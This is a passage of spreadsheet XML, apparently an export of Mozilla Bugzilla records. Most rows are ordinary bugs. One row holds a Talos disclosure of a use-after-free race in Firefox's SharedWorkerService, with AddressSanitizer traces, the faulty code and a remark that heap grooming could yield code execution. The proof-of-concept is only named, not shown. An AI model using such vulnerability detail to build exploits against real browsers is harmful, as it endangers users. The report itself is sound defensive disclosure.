        <v>1</v>
      </c>
      <c r="G4009" t="n">
        <v>5</v>
      </c>
      <c r="H4009" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4009" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J4009" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4009" t="inlineStr">
        <is>
          <t>Firefox 4</t>
        </is>
      </c>
      <c r="L4009" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4009" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4009" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4009" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4009" t="inlineStr"/>
      <c r="Q4009" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4009" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4009" t="inlineStr">
        <is>
          <t>2.0</t>
        </is>
      </c>
      <c r="T4009" t="n">
        <v>1</v>
      </c>
      <c r="U4009" t="n">
        <v>0</v>
      </c>
      <c r="V4009" t="n">
        <v>3</v>
      </c>
      <c r="W4009" t="inlineStr">
        <is>
          <t>PDFs have been updated! Here is the link:
http://dl.dropbox.com/u/18740830/Moz/Fx4_Install_Guides_WIN_MAC_updated.zip
Ty included both compressed/optimized and uncompressed versions of the PDFs.
PSD file with the latest copy and hi-res screens can be grabbed from here:
http://dl.dropbox.com/u/18740830/Moz/FX4_Install_Guide_WIN_MAC.psd.zip</t>
        </is>
      </c>
      <c r="X4009" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4010">
      <c r="A4010" t="n">
        <v>293505</v>
      </c>
      <c r="B4010" t="inlineStr">
        <is>
          <t>2005-05-09 11:59:21 -0700</t>
        </is>
      </c>
      <c r="C4010" t="inlineStr">
        <is>
          <t>web page colors specified incorrectly</t>
        </is>
      </c>
      <c r="D4010" t="inlineStr">
        <is>
          <t>2011-06-26 22:59:39 -0700</t>
        </is>
      </c>
      <c r="E4010" t="n">
        <v>1</v>
      </c>
      <c r="F4010" t="n">
        <v>1</v>
      </c>
      <c r="G4010" t="n">
        <v>7</v>
      </c>
      <c r="H4010" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4010" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J4010" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4010" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4010" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4010" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4010" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4010" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4010" t="inlineStr">
        <is>
          <t>[blocker will fix]</t>
        </is>
      </c>
      <c r="Q4010" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4010" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4010" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4010" t="n">
        <v>1</v>
      </c>
      <c r="U4010" t="n">
        <v>0</v>
      </c>
      <c r="V4010" t="n">
        <v>3</v>
      </c>
      <c r="W4010" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; cs-CZ; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; cs-CZ; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Please, apply fix from
https://bugzilla.mozilla.org/show_bug.cgi?id=272456
to bugzilla.mozilla.org stylesheet and template.
Reproducible: Always
Steps to Reproduce:
1. Set default web page colors to light on dark (ie black background, white text
and links)
2. go to bugzilla.mozilla.org
Actual Results:  
bugzilla pages are unreadable
Expected Results:  
readable colors</t>
        </is>
      </c>
      <c r="X4010" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4011">
      <c r="A4011" t="n">
        <v>571443</v>
      </c>
      <c r="B4011" t="inlineStr">
        <is>
          <t>2010-06-10 22:37:16 -0700</t>
        </is>
      </c>
      <c r="C4011" t="inlineStr">
        <is>
          <t>"get_fix_stack" step should not use obsolete fix-macosx-stack.pl (got "Bad output from otool" on Mac64)</t>
        </is>
      </c>
      <c r="D4011" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4011" t="n">
        <v>1</v>
      </c>
      <c r="F4011" t="n">
        <v>1</v>
      </c>
      <c r="G4011" t="n">
        <v>5</v>
      </c>
      <c r="H4011" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4011" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4011" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4011" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4011" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4011" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4011" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4011" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4011" t="inlineStr">
        <is>
          <t>[disabled on buildbot-0.8.0 branch] [automation]</t>
        </is>
      </c>
      <c r="Q4011" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4011" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4011" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4011" t="n">
        <v>1</v>
      </c>
      <c r="U4011" t="n">
        <v>0</v>
      </c>
      <c r="V4011" t="n">
        <v>29</v>
      </c>
      <c r="W4011" t="inlineStr">
        <is>
          <t>http://mxr.mozilla.org/build/source/buildbotcustom/process/factory.py#842
When fix_stack_using_bpsyms.py is ready (bug 570287), get_fix_stack should be changed to use it instead of fix-%s-stack.pl.
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1276230745.1276232213.506.gz&amp;fulltext=1
If this red is frequent, maybe we could temporarily skip the stack fixer, and use "cp" instead.  (Don't use fix_macosx_stack.py, it's busted on 64-bit too.)</t>
        </is>
      </c>
      <c r="X4011" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4012">
      <c r="A4012" t="n">
        <v>1631618</v>
      </c>
      <c r="B4012" t="inlineStr">
        <is>
          <t>2020-04-20 14:57:50 -0700</t>
        </is>
      </c>
      <c r="C4012" t="inlineStr">
        <is>
          <t>[TALOS-2020-1053] use-after-free in SharedWorkerService</t>
        </is>
      </c>
      <c r="D4012" t="inlineStr">
        <is>
          <t>2020-12-18 17:20:27 -0800</t>
        </is>
      </c>
      <c r="E4012" t="n">
        <v>1</v>
      </c>
      <c r="F4012" t="n">
        <v>1</v>
      </c>
      <c r="G4012" t="n">
        <v>3</v>
      </c>
      <c r="H4012" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4012" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4012" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K4012" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4012" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4012" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4012" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4012" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4012" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main77+][adv-esr68.9+][sec-survey]</t>
        </is>
      </c>
      <c r="Q4012" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4012" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4012" t="inlineStr">
        <is>
          <t>mozilla78</t>
        </is>
      </c>
      <c r="T4012" t="n">
        <v>1</v>
      </c>
      <c r="U4012" t="n">
        <v>0</v>
      </c>
      <c r="V4012" t="n">
        <v>32</v>
      </c>
      <c r="W4012" t="inlineStr">
        <is>
          <t>Created attachment 9141879
POC_SharedWorkerService Use-After-Free (race-condition) remote code execution.html
[from mail to security@ from Talos, some boilerplate snipped]
### Mozilla Firefox SharedWorkerService Code Execution Vulnerability
An exploitable code execution vulnerability exists in the SharedWorkerService functionality of Mozilla Firefox 76.0a1 (2020-04-01) x64. A specially crafted HTML web page can cause a use after free condition, resulting in a remote code execution. The victim needs to visit malicious web site to trigger the vulnerability.
### Tested Versions
Mozilla Firefox 76.0a1 (2020-04-01) x64   
### CVSSv3 Score
8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
### CWE
CWE-416 - Use After Free
### Details
Mozilla Firefox is one of the most popular web browsers on the world available for a variety of the different platforms : Windows, Linux, OSX, Android and more. Its active development ensure support for the newest web technologies like HTML5 or CSS3.
The vulnerability is related with the `SharedWorker` component and objects internaly related with it. A malicious web page can lead to a race condition situation which can cause a use-after-free vulnerability and remote code execution.
Tracking an `SharedWorkerService` object life cycle we can notice that there is an allocation made :
```
	previously allocated by thread T46 (IPDL Background) here:
		#0 0x55b699485b0d in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:145:3
		#1 0x55b6994bb4fd in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52:15
		#2 0x7fa306effc46 in operator new /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33:10
		#3 0x7fa306effc46 in mozilla::dom::SharedWorkerService::GetOrCreate() /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerService.cpp:126:42
		#4 0x7fa306effa77 in mozilla::dom::SharedWorkerParent::Initialize(mozilla::dom::RemoteWorkerData const&amp;, unsigned long, mozilla::dom::MessagePortIdentifier const&amp;) /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerParent.cpp:50:41
		#5 0x7fa3014c45aa in mozilla::ipc::BackgroundParentImpl::RecvPSharedWorkerConstructor(mozilla::dom::PSharedWorkerParent*, mozilla::dom::RemoteWorkerData const&amp;, unsigned long const&amp;, mozilla::dom::MessagePortIdentifier const&amp;) /builds/worker/checkouts/gecko/ipc/glue/BackgroundParentImpl.cpp:552:10
		#6 0x7fa301c6538f in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PBackgroundParent.cpp:5068:28
		#7 0x7fa30153813c in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2187:25
		#8 0x7fa301535255 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2111:9
		#9 0x7fa3015366cf in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1959:3
		#10 0x7fa301536ede in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1990:13
		#11 0x7fa3004c58ce in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1220:14
		#12 0x7fa3004d035c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:481:10
		#13 0x7fa301540ec9 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:332:5
		#14 0x7fa30146cfe7 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:315:10
		#15 0x7fa30146cfe7 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:308:3
		#16 0x7fa30146cfe7 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:290:3
		#17 0x7fa3004bf245 in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:464:10
		#18 0x7fa3169a51fe in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
		#19 0x7fa31a2c2668 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9668)
```
Further, in a consequence of handling the next event inside another thread, the `SharedWorkerService` object gets deallocated:
```
	0x606000315770 is located 48 bytes inside of 64-byte region [0x606000315740,0x606000315780)
	freed by thread T0 here:
		#0 0x55b69948588d in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
		#1 0x7fa306eff34c in operator delete /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:51:10
		#2 0x7fa306eff34c in Release /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerService.h:31:3
		#3 0x7fa306eff34c in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
		#4 0x7fa306eff34c in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
		#5 0x7fa306eff34c in ~RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:81:7
		#6 0x7fa306eff34c in mozilla::dom::SharedWorkerManagerHolder::~SharedWorkerManagerHolder() /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerManager.cpp:285:1
		#7 0x7fa306f04611 in mozilla::dom::SharedWorkerManagerHolder::Release() /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerManager.h:32:3
		#8 0x7fa306f0853a in detail::ProxyReleaseEvent&lt;mozilla::dom::SharedWorkerManagerHolder&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsProxyRelease.h:36:5
		#9 0x7fa3004c58ce in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1220:14
		#10 0x7fa3004d035c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:481:10
		#11 0x7fa30153fe6a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:87:21
		#12 0x7fa30146cfe7 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:315:10
		#13 0x7fa30146cfe7 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:308:3
		#14 0x7fa30146cfe7 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:290:3
		#15 0x7fa307562ff8 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137:27
		#16 0x7fa30aafa5bb in nsAppStartup::Run() /builds/worker/checkouts/gecko/toolkit/components/startup/nsAppStartup.cpp:271:30
		#17 0x7fa30ad00546 in XREMain::XRE_mainRun() /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:4614:22
		#18 0x7fa30ad023b1 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:4749:8
		#19 0x7fa30ad030f3 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:4800:21
		#20 0x55b6994b8726 in do_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:217:22
		#21 0x55b6994b8726 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:331:16
		#22 0x7fa319d851e2 in __libc_start_main /build/glibc-t7JzpG/glibc-2.30/csu/../csu/libc-start.c:308:16
```
"Simultaneously" execution of thread T46 continues which in the final result leads to a use-after-free of the `SharedWorkerService` object:
```
==12981==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000315770 at pc 0x7fa306f0022f bp 0x7fa2e155f5f0 sp 0x7fa2e155f5e8
WRITE of size 8 at 0x606000315770 thread T46 (IPDL Background)
    #0 0x7fa306f0022e in fetch_add /builds/worker/fetches/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/atomic_base.h:514:16
    #1 0x7fa306f0022e in operator++ /builds/worker/workspace/obj-build/dist/include/nsISupportsImpl.h:331:19
    #2 0x7fa306f0022e in AddRef /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerService.h:31:3
    #3 0x7fa306f0022e in AddRef /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:49:39
    #4 0x7fa306f0022e in AddRef /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:380:35
    #5 0x7fa306f0022e in RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:109:7
    #6 0x7fa306f0022e in GetOrCreateWorkerManagerRunnable /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerService.cpp:37:9
    #7 0x7fa306f0022e in mozilla::dom::SharedWorkerService::GetOrCreateWorkerManager(mozilla::dom::SharedWorkerParent*, mozilla::dom::RemoteWorkerData const&amp;, unsigned long, mozilla::dom::MessagePortIdentifier const&amp;) /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerService.cpp:159:11
    #8 0x7fa306effaa7 in mozilla::dom::SharedWorkerParent::Initialize(mozilla::dom::RemoteWorkerData const&amp;, unsigned long, mozilla::dom::MessagePortIdentifier const&amp;) /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerParent.cpp:52:12
    #9 0x7fa3014c45aa in mozilla::ipc::BackgroundParentImpl::RecvPSharedWorkerConstructor(mozilla::dom::PSharedWorkerParent*, mozilla::dom::RemoteWorkerData const&amp;, unsigned long const&amp;, mozilla::dom::MessagePortIdentifier const&amp;) /builds/worker/checkouts/gecko/ipc/glue/BackgroundParentImpl.cpp:552:10
    #10 0x7fa301c6538f in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PBackgroundParent.cpp:5068:28
    #11 0x7fa30153813c in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2187:25
    #12 0x7fa301535255 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2111:9
    #13 0x7fa3015366cf in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1959:3
    #14 0x7fa301536ede in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1990:13
    #15 0x7fa3004c58ce in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1220:14
    #16 0x7fa3004d035c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:481:10
    #17 0x7fa301540ed4 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:302:20
    #18 0x7fa30146cfe7 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:315:10
    #19 0x7fa30146cfe7 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:308:3
    #20 0x7fa30146cfe7 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:290:3
    #21 0x7fa3004bf245 in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:464:10
    #22 0x7fa3169a51fe in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #23 0x7fa31a2c2668 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9668)
    #24 0x7fa319e80322 in clone /build/glibc-t7JzpG/glibc-2.30/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
```
Further analysis revealed that the root cause of that vulnerability seems to be a lack of Mutex object in the `GetOrCreateWorkerManager` method:
https://github.com/mozilla/gecko-dev/blob/5a52cec97c41ae1eda9412dfe6f4099a9af4c7dd/dom/workers/sharedworkers/SharedWorkerService.cpp#L152
```C++
	Line 152	void SharedWorkerService::GetOrCreateWorkerManager(
	Line 153		SharedWorkerParent* aActor, const RemoteWorkerData&amp; aData,
	Line 154		uint64_t aWindowID, const MessagePortIdentifier&amp; aPortIdentifier) {
	Line 155	  AssertIsOnBackgroundThread();
	Line 156
	Line 157	  // The real check happens on main-thread.
	Line 158	  RefPtr&lt;GetOrCreateWorkerManagerRunnable&gt; r =
	Line 159		  new GetOrCreateWorkerManagerRunnable(this, aActor, aData, aWindowID,
	Line 160											   aPortIdentifier);
```
In `line 159` the `SharedWorkerService` object, represented by `this`, is passed as an argument to the `GetOrCreateWorkerManagerRunnable` method.
Meanwhile it is destroyed via the `~SharedWorkerManagerHolder()` destructor.
```
	0x606000315770 is located 48 bytes inside of 64-byte region [0x606000315740,0x606000315780)
	freed by thread T0 here:
		#0 0x55b69948588d in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
		#1 0x7fa306eff34c in operator delete /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:51:10
		#2 0x7fa306eff34c in Release /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerService.h:31:3
		#3 0x7fa306eff34c in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
		#4 0x7fa306eff34c in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
		#5 0x7fa306eff34c in ~RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:81:7
		#6 0x7fa306eff34c in mozilla::dom::SharedWorkerManagerHolder::~SharedWorkerManagerHolder() /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerManager.cpp:285:1
```
Proper heap grooming can give an attacker full control of this use-after-free vulnerability and as a result could allow it to be turned into arbitrary code execution.
### Crash Information
```
=================================================================
	==12981==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000315770 at pc 0x7fa306f0022f bp 0x7fa2e155f5f0 sp 0x7fa2e155f5e8
	WRITE of size 8 at 0x606000315770 thread T46 (IPDL Background)
		#0 0x7fa306f0022e in fetch_add /builds/worker/fetches/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/atomic_base.h:514:16
		#1 0x7fa306f0022e in operator++ /builds/worker/workspace/obj-build/dist/include/nsISupportsImpl.h:331:19
		#2 0x7fa306f0022e in AddRef /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerService.h:31:3
		#3 0x7fa306f0022e in AddRef /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:49:39
		#4 0x7fa306f0022e in AddRef /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:380:35
		#5 0x7fa306f0022e in RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:109:7
		#6 0x7fa306f0022e in GetOrCreateWorkerManagerRunnable /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerService.cpp:37:9
		#7 0x7fa306f0022e in mozilla::dom::SharedWorkerService::GetOrCreateWorkerManager(mozilla::dom::SharedWorkerParent*, mozilla::dom::RemoteWorkerData const&amp;, unsigned long, mozilla::dom::MessagePortIdentifier const&amp;) /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerService.cpp:159:11
		#8 0x7fa306effaa7 in mozilla::dom::SharedWorkerParent::Initialize(mozilla::dom::RemoteWorkerData const&amp;, unsigned long, mozilla::dom::MessagePortIdentifier const&amp;) /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerParent.cpp:52:12
		#9 0x7fa3014c45aa in mozilla::ipc::BackgroundParentImpl::RecvPSharedWorkerConstructor(mozilla::dom::PSharedWorkerParent*, mozilla::dom::RemoteWorkerData const&amp;, unsigned long const&amp;, mozilla::dom::MessagePortIdentifier const&amp;) /builds/worker/checkouts/gecko/ipc/glue/BackgroundParentImpl.cpp:552:10
		#10 0x7fa301c6538f in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PBackgroundParent.cpp:5068:28
		#11 0x7fa30153813c in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2187:25
		#12 0x7fa301535255 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2111:9
		#13 0x7fa3015366cf in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1959:3
		#14 0x7fa301536ede in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1990:13
		#15 0x7fa3004c58ce in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1220:14
		#16 0x7fa3004d035c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:481:10
		#17 0x7fa301540ed4 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:302:20
		#18 0x7fa30146cfe7 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:315:10
		#19 0x7fa30146cfe7 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:308:3
		#20 0x7fa30146cfe7 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:290:3
		#21 0x7fa3004bf245 in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:464:10
		#22 0x7fa3169a51fe in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
		#23 0x7fa31a2c2668 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9668)
		#24 0x7fa319e80322 in clone /build/glibc-t7JzpG/glibc-2.30/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
	0x606000315770 is located 48 bytes inside of 64-byte region [0x606000315740,0x606000315780)
	freed by thread T0 here:
		#0 0x55b69948588d in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
		#1 0x7fa306eff34c in operator delete /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:51:10
		#2 0x7fa306eff34c in Release /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerService.h:31:3
		#3 0x7fa306eff34c in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
		#4 0x7fa306eff34c in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
		#5 0x7fa306eff34c in ~RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:81:7
		#6 0x7fa306eff34c in mozilla::dom::SharedWorkerManagerHolder::~SharedWorkerManagerHolder() /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerManager.cpp:285:1
		#7 0x7fa306f04611 in mozilla::dom::SharedWorkerManagerHolder::Release() /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerManager.h:32:3
		#8 0x7fa306f0853a in detail::ProxyReleaseEvent&lt;mozilla::dom::SharedWorkerManagerHolder&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsProxyRelease.h:36:5
		#9 0x7fa3004c58ce in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1220:14
		#10 0x7fa3004d035c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:481:10
		#11 0x7fa30153fe6a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:87:21
		#12 0x7fa30146cfe7 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:315:10
